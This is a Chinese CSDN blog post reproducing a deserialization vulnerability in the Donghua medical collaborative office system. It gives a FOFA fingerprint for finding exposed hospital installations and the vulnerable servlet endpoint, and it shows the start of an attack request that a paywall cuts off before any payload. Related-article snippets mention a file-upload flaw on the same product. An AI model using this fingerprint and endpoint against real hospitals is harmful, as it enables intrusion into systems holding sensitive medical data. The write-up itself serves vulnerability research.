【漏洞复现】东华**协同办公系统反序列化漏洞

已于 2024-01-03 09:45:02 修改
阅读量668 收藏 10
点赞数 7
分类专栏: 漏洞复现 文章标签: web安全 网络安全
于 2024-01-03 09:32:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/135355472
版权

文章目录

漏洞描述

东华医疗协同办公系统是专为医疗机构设计的一套综合性办公管理软件,旨在提升医疗机构内部协同工作效率。该系统集成了日常办公所需的各种功能模块,包括日程管理、会议管理、文件共享、任务分配等,实现了信息的集中管理和统一协作平台。通过该系统,医疗机构内的医生、护士、行政人员等可以方便地进行跨部门沟通和协作,快速共享和处理信息,提高工作效率。此外,东华医疗协同办公系统还具备数据安全保障机制,确保敏感信息的安全性和保密性。它还支持移动端访问,方便用户随时随地进行办公操作。通过这个系统,东华医疗机构能够建立高效的协同工作环境,提升整体运营效能。

资产测绘

FOFA:body="skin/charmBlue/css/dialog.css"

漏洞复现

POST /workflow/DemoDefinitionProxyServlet/111 HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 13283
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Origin: https://xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image<
最低0.47元/天 解锁文章
新疆东坡肉
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
东华医疗协同办公系统 文件上传漏洞复现
0xSec
12-29 1393
东华医疗协同办公系统 connector接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现东华医疗协同办公系统文件上传漏洞
weixin_45530380的博客
01-02 1249
【代码】【漏洞复现东华医疗协同办公系统文件上传漏洞
OA系统漏洞记录
Aquarius_ego的博客
05-14 4727
OA系统介绍及相关漏洞(不断更新哦~)
东华软件反统方:一个能扼住医疗信息泄露咽喉的解决方案
weixin_34365635的博客
08-01 624
【51CTO.com原创稿件】在很多IT厂商眼中,医疗行业是一个让人既爱又怵的香饽饽:这个市场蕴藏着庞大的待开发IT商机,然而倘若没有对这个行业的特殊性有着深入理解,就无法制定出令用户满意的解决方案。正所谓危机与商机并存,遗憾的是不少IT厂商都在医疗行业沉戟落沙。 东华软件算是活跃在医疗行业的老牌IT厂商了,进入医疗行业市场已经有10年之久,对这个行业信...
[zkaq靶场]命令执行--IBOS协同办公系统通杀漏洞
wwxxee
05-11 1804
命令执行 命令执行相关函数 system() 能够将字符串作为OS命令执行,自带输出功能。 exec() 将字符串作为OS命令执行,需要输出 shell_exec() 将字符串作为OS命令执行,需要输出 passthru() 能够将字符串作为OS命令执行,自带输出 popen() 将字符串作为OS命令执行,但是该函数返回一个文件指针。 反引号`` 反引号内的字符串也会被解析成OS命令。 靶场 本地测试 本期主角:ibos(一款协同办公系统) 版本:4.5.5 安装: 安装完成之后
然之协同系统漏洞利用汇总
vspiders的博客
03-21 4541
Author:Vspiders首发地址:https://xianzhi.aliyun.com/forum/topic/2135前言前段时间在做然之协同系统代码审计,这里做个简单的总结。第一弹:SQL注入漏洞0x01 注入漏洞分析问题出现在/lib/base/dao/dao.class.php文件中的orderBy函数中,public function orderBy($order) { i...
东华杯2021 ezgadget复现
Sk1y的博客
04-01 960
东华杯2021 ezgadget复现 文章目录东华杯2021 ezgadget复现环境搭建源码分析exp参考链接 环境搭建 题目给了ezgadget附件,需要自取 链接:https://pan.baidu.com/s/1mZt_aorU_kZDo-GJH4wwxQ 提取码:tmng 运行(需要有java环境) java -jar ezgadget.jar 源码分析 我们把附件扔进jd-gui,文件不是很多 mark一下:我在本地复现的时候,用idea创建的一个maven项目,没有用模板,然后将jd-gui
东华数字化医院管理系统之门诊医生工作站操作手册.doc
06-20
东华数字化医院管理系统之门诊医生工作站操作手册
基于Python机器学习的可视化麻纱质量预测系统-东华大学硕士项目2017
04-25
基于Python机器学习的可视化麻纱质量预测系统项目研究案例
东华大学操作系统-罗辛
09-23
上课时根据视频和课件整理出来的思维导图,之后还做了一些增添和删改,分享出来给大家,不知道说啥了,给大家拜个早年
HIS系统东华、天健表结构及实施计划
07-08
HIS系统东华、天健表结构及实施计划
2016-2018年东华理工大学802地理信息系统原理考研真题
04-01
该资源为2016-2018年东华理工大学802地理信息系统原理考研真题,资源高清无水印哦! 该资源为2016-2018年东华理工大学802地理信息系统原理考研真题,资源高清无水印哦!
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 693
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全攻防基础入门笔记--操作系统&名词解释&文件下载&反弹shell&防火墙绕过
最新发布
谜语人的博客
06-15 820
全程Proof of Concept,中文"概念验证",常指一段漏洞证明的代码。
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 399
网络安全管理组织架构复习
攻防演练之-网络安全产品大巡礼二
村中少年的专栏
06-11 931
介绍SOAR,XDR,邮件网关email,sandbox云沙箱,firewall防火墙,WAF等甲方常见的安全产品
专家解读 | NIST网络安全框架(3):层级配置
Enlink_Young的博客
06-11 1039
NIST 明确指出,CSF层级并非成熟度模型,而是一种指导性的方法,用于阐明网络安全风险管理和企业运营风险管理之间的关系,简而言之,层级提供了一条清晰的路径,将网络安全风险纳入企业的整体组织风险中,同时作为评估当前网络安全风险管理实践的基准,帮助组织制定改善其网络安全状况的计划。NIST CSF在核心部分提供了六个类别的关键功能和子功能,并围绕CSF的使用提供了层级(Tier)和配置(Profile)两种工具,使不同组织和用户更方便有效地使用CSF,本文将深入探讨CSF层级和配置的主要内容,及其使用方法。
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【一】
q742971636的博客
06-09 1436
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。
东华软件反洗钱系统怎么样
05-31
东华软件公司在反洗钱领域也有一定的实力和经验。其反洗钱解决方案主要包括KYC客户身份识别、反欺诈、交易监控和风险评估等模块,通过多维度的分析和监测来识别可疑交易和行为,并生成报告供监管部门使用,帮助金融机构降低洗钱风险。东华软件的反洗钱解决方案已经在多家银行、证券和保险公司等金融机构得到了应用,反响良好。不过,具体的产品质量和服务水平还需要根据具体情况进行评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值